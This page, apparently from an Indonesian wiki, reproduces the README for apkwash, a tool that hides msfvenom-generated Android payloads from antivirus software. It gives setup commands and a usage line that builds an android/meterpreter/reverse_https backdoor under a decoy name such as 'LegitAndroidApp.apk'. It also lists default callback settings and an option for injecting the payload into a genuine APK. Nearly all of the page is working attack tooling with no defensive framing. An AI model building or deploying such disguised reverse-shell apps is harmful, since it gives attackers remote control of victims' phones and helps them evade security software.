MSF: apkwash untuk mengelabuhi antivirus

From OnnoWiki
Jump to navigation Jump to search

sumber: https://github.com/jbreed/apkwash


apkwash

Android APK Antivirus evasion for msfvenom generated payloads.

Tested on Kali linux rolling.

Setup:

apt-get update && apt-get dist-upgrade
chmod +x apkwash
mv apkwash /usr/local/bin/.

On first run:

  • Downloads and places apktool.jar in the user's /usr/local/bin directory
  • Generates debug keystore for signing. Places it in ~/.android/


Usage Example:

apkwash -p android/meterpreter/reverse_https LHOST= LPORT= -o LegitAndroidApp.apk

Output:

<LegitAndroidApp>.apk & <LegitAndroidApp>.listener

Default values:

payload=android/meterpreter/reverse_https
LHOST=<eth0 IP address>
LPORT=443
output=AndroidService.apk

Options

-p | --payload <payload> This sets the payload to be generated by msfvenom.
-o | --output <outfile.apk> This sets the name of the APK created as well as the output apk file.
-x | --original <infile.apk> Input APK to inject the payload into (later update).
-g | --generate Generate a payload using defaults
-n | --newkey Generate a new debug key before signing
-v | --verbose Don't mask output of commands
-d | --debug Leaves the /tmp/payload files in place for review
-h | --help Help information


Referensi